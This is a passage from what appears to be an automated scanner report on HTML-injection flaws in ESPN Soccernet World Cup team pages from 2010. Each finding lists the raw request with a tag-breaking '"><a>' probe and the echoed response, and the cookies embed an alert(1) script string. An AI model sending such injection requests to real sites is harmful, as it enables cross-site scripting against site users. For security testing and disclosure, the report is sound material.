s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:31 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Cache-Expires: Sat, 06 Nov 2010 23:14:31 GMT Content-Length: 80435 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>France Football / S ...[SNIP]... <a href="/worldcup2010/team?team=478&_slug_=francefa8c8"><a>f460e0de5a0&topId=806664&linktext=New+France+coach+admits+concerns"> ...[SNIP]...
2.88. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/478/france
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80bf3"><a>247a72dcc41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/478/france?80bf3"><a>247a72dcc41=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:24 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Cache-Expires: Sat, 06 Nov 2010 23:13:24 GMT Content-Length: 80543 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>France Football / S ...[SNIP]... <a href="/worldcup2010/team?team=478&80bf3"><a>247a72dcc41=1&_slug_=france&80bf3"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a81a1"><a>b81a40a8bd9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4789/ivory-coasta81a1"><a>b81a40a8bd9 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:15:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:15:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Cache-Expires: Sat, 06 Nov 2010 23:20:08 GMT Content-Length: 81695 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ivory Coast Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4789&_slug_=ivory-coasta81a1"><a>b81a40a8bd9&topId=802166&linktext=Eriksson+hails+Ivory+Coast+players"> ...[SNIP]...
2.90. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/4789/ivory-coast
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ff8"><a>ef29493db25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4789/ivory-coast?44ff8"><a>ef29493db25=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:11:09 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:11:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:16:08 GMT Content-Length: 81803 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ivory Coast Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4789&44ff8"><a>ef29493db25=1&_slug_=ivory-coast&44ff8"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b84"><a>1e9fca54d00 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/479/denmark46b84"><a>1e9fca54d00 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:48 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:13:48 GMT Content-Length: 82130 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Denmark Football / ...[SNIP]... <a href="/worldcup2010/team?team=479&_slug_=denmark46b84"><a>1e9fca54d00&topId=801786&linktext=Denmark+coach+devastated+by+defeat"> ...[SNIP]...
2.92. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/479/denmark
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92395"><a>78611054bea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/479/denmark?92395"><a>78611054bea=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:53 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:53 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Cache-Expires: Sat, 06 Nov 2010 23:12:53 GMT Content-Length: 82238 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Denmark Football / ...[SNIP]... <a href="/worldcup2010/team?team=479&92395"><a>78611054bea=1&_slug_=denmark&92395"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95388"><a>7a7e4d9961e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/481/germany95388"><a>7a7e4d9961e HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN04 Cache-Expires: Sat, 06 Nov 2010 23:14:42 GMT Content-Length: 80545 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Germany Football / ...[SNIP]... <a href="/worldcup2010/team?team=481&_slug_=germany95388"><a>7a7e4d9961e&topId=807747&linktext=Germany+finish+in+third+place"> ...[SNIP]...
2.94. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/481/germany
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6197"><a>19cb7e46d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/481/germany?c6197"><a>19cb7e46d2e=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:44 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:44 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:13:43 GMT Content-Length: 80653 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Germany Football / ...[SNIP]... <a href="/worldcup2010/team?team=481&c6197"><a>19cb7e46d2e=1&_slug_=germany&c6197"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1efcc"><a>d926d468a72 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
